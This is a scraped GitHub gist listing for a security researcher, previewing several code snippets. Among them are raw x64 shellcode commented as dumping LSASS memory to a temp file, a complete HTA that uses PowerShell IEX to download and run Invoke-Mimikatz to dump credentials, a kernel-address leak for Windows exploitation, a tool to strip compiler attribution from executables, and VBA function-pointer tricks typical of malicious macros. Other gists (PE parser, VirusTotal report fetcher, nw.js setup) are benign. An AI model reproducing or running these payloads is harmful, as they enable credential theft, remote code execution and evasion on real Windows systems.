Skip to content

Instantly share code, notes, and snippets.

View aaaddress1's full-sized avatar
🤗
buy me a beer plz 🍺

Sheng-Hao Ma aaaddress1

🤗
buy me a beer plz 🍺
1.3k followers · 35 following
View GitHub Profile
@aaaddress1
aaaddress1 / LeakNtKrnlAddr.ps1
Created September 26, 2023 03:16
Abuse EnumDeviceDrivers() to leak the location of Windows NT Kermel
Add-Type -TypeDefinition @"
// ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
public static class EVD2
{
[DllImport("kernel32.dll")]
@aaaddress1
aaaddress1 / ExeMask.py
Last active April 6, 2024 05:16
Strip your personal compile info from Exe Files
import pefile, struct, sys
if len(sys.argv) != 2:
print(f"Strip your personal compile info from Exe Files by aaaddress1@chroot.org")
print(f"Usage: {sys.argv[0]} [path/to/exe]")
sys.exit(-1)
# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402
def mask_myRichHdr(in_pefile):
DANS = 0x536E6144 # 'DanS' as dword
@aaaddress1
aaaddress1 / shellcode64.c
Last active July 6, 2023 09:37
Windows 64bit Shellcode
// sprintf(commandLine, L"%i C:\\Windows\\Temp\\DumpLsass.log full", GetCurrentProcessId); MiniDumpW(0, 0, commandLine);
char shellcode_selfDumpToTmp[] = "\xe9\x0c\x02\x00\x00\x90\x48\x89\xc8\x48\x8d\x49\x02\x66\x83\x38\x00\xb8\x00\x00\x00\x00\x74\x28\x0f\x1f\x84\x00\x00\x00\x00\x00\x44\x0f\xb7\x01\x48\x83\xc1\x02\x44\x89\xc2\x83\xca\x20\x0f\xb7\xd2\x01\xd0\xc1\xc8\x08\x66\x45\x85\xc0\x75\xe4\xc3\x0f\x1f\x00\xc3\x48\x89\xc8\x48\x8d\x49\x01\x80\x38\x00\xb8\x00\x00\x00\x00\x74\x26\x66\x0f\x1f\x44\x00\x00\x44\x0f\xb6\x01\x48\x83\xc1\x01\x44\x89\xc2\x83\xca\x20\x0f\xbe\xd2\x01\xd0\xc1\xc8\x08\x45\x84\xc0\x75\xe5\xc3\x0f\x1f\x40\x00\xc3\x65\x48\x8b\x04\x25\x60\x00\x00\x00\x48\x8b\x40\x18\x4c\x8b\x48\x20\x4c\x8d\x58\x20\x4d\x39\xcb\x74\x34\x48\x83\xec\x28\x41\x89\xca\xeb\x0c\x0f\x1f\x40\x00\x4d\x8b\x09\x4d\x39\xcb\x74\x18\x49\x8b\x49\x50\xe8\x55\xff\xff\xff\x44\x39\xd0\x75\xea\x49\x8b\x41\x20\x48\x83\xc4\x28\xc3\x90\x31\xc0\x48\x83\xc4\x28\xc3\x31\xc0\xc3\x57\x56\x53\x48\x83\xec\x20\x48\x63\x41\x3c\x8b\xb4\x01\x88\
@aaaddress1
aaaddress1 / rtVirusTotalScan.py
Last active February 1, 2023 05:29
Real-Time Parse VirusTotal's Cuckoo Reports for the specific Sample by Hash
# can search sample's hash on virustotal by the following query:
# >>> {RANSOMWARE_FAMILY} and sandbox_name:virustotal_cuckoofork and engines:ransom
import sys
import requests
if len(sys.argv) != 2:
print(f"usage: {sys.argv[0]} <sample-hash> by aaaddress1.\n")
sys.exit(-1)
url = 'https://www.virustotal.com/vtapi/v2/file/behaviour'
@aaaddress1
aaaddress1 / gist:68296502e7e8849ee7d5994ca2031310
Created January 31, 2023 14:06
wget //github.com/LeonardLaszlo/nw.js-armv7-binaries/releases/download/nw60-arm64_2022-01-08/nw60-arm64_2022-01-08.tar.gz
tar xvf nw60-arm64_2022-01-08.tar.gz
tar xvf usr/docker/dist/nwjs-chromium-ffmpeg-branding/nwjs-symbol-v0.60.1-linux-arm64.tar.gz
cd nwjs-v0.60.1-linux-arm64/
export DISPLAY=:0.0
./nw --use-gl=egl --ignore-gpu-blacklist --disable-accelerated-2d-canvas --num-raster-threads=2
@aaaddress1
aaaddress1 / gist:b19b5b0bfc5235d8d9499eef79dd7b84
Created May 15, 2022 06:47
LdrpInitialize
__int64 __fastcall LdrpInitialize(PCONTEXT threadCtx, IMAGE_DOS_HEADER *peImgToFix)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
currTeb = NtCurrentTeb();
while ( 1 )
{
loadStep = (unsigned int)_InterlockedCompareExchange(&LdrpProcessInitialized, 1, 0);
if ( (_DWORD)loadStep == 1 && (currTeb->SameTebFlags & 0x2000) == 0 )
goto done;
@aaaddress1
aaaddress1 / invokeMimikatz.hta
Created December 16, 2021 08:08
invokeMimikatz.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
@aaaddress1
aaaddress1 / peParser.cpp
Created December 2, 2021 13:02
#include <windows.h>
#include <iostream>
bool readBinFile(const char fileName[], char*& bufPtr, DWORD& length) {
if (FILE* fp = fopen(fileName, "rb")) {
fseek(fp, 0, SEEK_END);
length = ftell(fp);
bufPtr = new char[length + 1];
fseek(fp, 0, SEEK_SET);
fread(bufPtr, sizeof(char), length, fp);
@aaaddress1
aaaddress1 / How to use a function pointer in VBA.md
Created November 18, 2021 15:26 — forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro

VB6 and VBA come with no support for function pointers.

Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.

These constraints can be avoided by using the DispCallFunc API. The DispCallFunc is widely used in VB6 when erasing the history of IE. Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.

As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.

@aaaddress1
aaaddress1 / x64FunctionPointer.vba
Created November 18, 2021 15:22 — forked from rmdavy/x64FunctionPointer.vba
x64FunctionPointerExample
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Const CC_STDCALL = 4
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr
Sub SayHello()